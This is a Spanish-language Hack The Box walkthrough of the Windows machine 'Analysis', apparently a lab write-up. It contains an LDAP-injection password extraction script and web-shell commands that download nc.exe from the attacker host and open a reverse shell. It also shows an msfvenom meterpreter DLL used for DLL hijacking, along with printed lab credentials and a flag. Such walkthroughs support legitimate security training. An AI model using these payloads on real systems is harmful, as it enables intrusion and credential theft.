Analysis

OS: Windows
Dificultad: Difícil
Puntos: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.96.0 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.96.0
Nmap scan report for 10.129.96.0
Host is up, received reset ttl 127 (0.074s latency).
Scanned at 2024-01-23 10:46:59 EST for 72s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-01-23 15:47:06Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3306/tcp  open  mysql         syn-ack ttl 127 MySQL (unauthorized)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
33060/tcp open  mysqlx?       syn-ack ttl 127
| fingerprint-strings: 
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

Enumeration

Fuzzing vhost.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.analysis.htb" -u http://analysis.htb/
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://analysis.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.analysis.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

internal                [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 73ms]

Fuzzing directories.

gobuster dir -u http://internal.analysis.htb/ -w /usr/share/wordlists/dirb/common.txt
                  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/dashboard            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users                (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]
gobuster dir -u http://internal.analysis.htb/employees -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/employees
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,asp,aspx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 1085]
/Login.php            (Status: 200) [Size: 1085]
gobuster dir -u http://internal.analysis.htb/users -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/users
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,asp,aspx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/list.php             (Status: 200) [Size: 17]

Accediendo a esa url nos muestra el siguiente mensaje.

curl -i http://internal.analysis.htb/users/list.php  
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.2.5
Date: Tue, 23 Jan 2024 16:50:06 GMT
Content-Length: 17

missing parameter

Fuzzing parametros.

ffuf -w /usr/share/wordlists/dirb/big.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=jdoe" -fw 2
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://internal.analysis.htb/users/list.php?FUZZ=jdoe
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 2
________________________________________________

name                    [Status: 200, Size: 406, Words: 11, Lines: 1, Duration: 82ms]

Enum users.

/opt/windows/kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d analysis.htb --dc 10.129.96.0
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/23/24 - Ronnie Flathers @ropnop

2024/01/23 11:06:21 >  Using KDC(s):
2024/01/23 11:06:21 >   10.129.96.0:88

2024/01/23 11:07:12 >  [+] VALID USERNAME:       jdoe@analysis.htb
2024/01/23 11:07:55 >  [+] VALID USERNAME:       ajohnson@analysis.htb
2024/01/23 11:09:31 >  [+] VALID USERNAME:       cwilliams@analysis.htb
2024/01/23 11:10:14 >  [+] VALID USERNAME:       wsmith@analysis.htb
2024/01/23 11:12:38 >  [+] VALID USERNAME:       jangel@analysis.htb
2024/01/23 11:21:33 >  [+] VALID USERNAME:       technician@analysis.htb

LDAP Injection

Identificamos que la aplicacion es vulnerable a LDAP Injection.

http://internal.analysis.htb/users/list.php?name=*

Fuzzing atributos.

http://internal.analysis.htb/users/list.php?name=technician)(userPassword=*

Dentro de todos los atributos que encontramos el que puede llegar a tener informacion importanto es description.

import string
import requests

url = "http://internal.analysis.htb/users/list.php?name=technician)(description="
password = ""

while True:
    
    for char in string.printable:
        if char not in ['(',')']:
            payload = password + char
            response = requests.get(url + payload + "*")

            if len(response.text) != 406:
                print(payload)
                password = payload
                break

            elif char == "*":
                password = payload
                break

Utilizando el script de arriba obtenemos el siguiente password.

technician@analysis.htb : 97NTtl*4QP96Bv

File Upload Revershell

Usando las credenciales obtenidas podemos autenticarnos en el portal de login.

http://internal.analysis.htb/employees/login.php

Podemos subir una web shell en la aplicacion.

http://internal.analysis.htb/dashboard/form.php

Utilizaremos los siguientes comandos para obtener reverse shell.

http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=mkdir+c:\temp
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=curl+10.10.14.9/nc.exe+-o+c:\temp\nc.exe
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=c:\temp\nc.exe+10.10.14.9+1234+-e+cmd.exe

Lateral Movement

Utilizando winpeas encontramos el password del usuario jdoe.

Nos conectamos por medio de winrm.

evil-winrm -i 10.10.11.250 -u 'jdoe' -p '7y4Z4^*y9Zzj'
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents> type ..\Desktop\user.txt
2234595e802096e282d2f9e421e6d664                                                                                                                             
*Evil-WinRM* PS C:\Users\jdoe\Documents>

Privilege Escalation

Binario con posibilidad de DLL Hijacking.

Snort(Snort)[C:\Snort\bin\snort.exe /SERVICE] - Autoload - No quotes and Space detected
Possible DLL Hijacking in binary folder: C:\Snort\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])

Snort configuration.

type C:\snort\etc\snort.conf

DLL Hijacking

Create dll.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f dll -o sf_engine.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: sf_engine.dll

Configure metasploit.

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4444
run

Upload dll.

upload /root/htb/Box/Analysis/sf_engine.dll C:\snort\lib\snort_dynamicpreprocessor\sf_engine.dll
Info: Uploading /root/htb/Box/Analysis/shell.dll to C:\snort\lib\snort_dynamicpreprocessor\shell.dll
                                        
Data: 12288 bytes of 12288 bytes copied
                                        
Info: Upload successful!

Una vez configurado el metasploit esperamos un minuto a que nos regrese la shell.

References

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/README.md#defaults-attributes
https://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt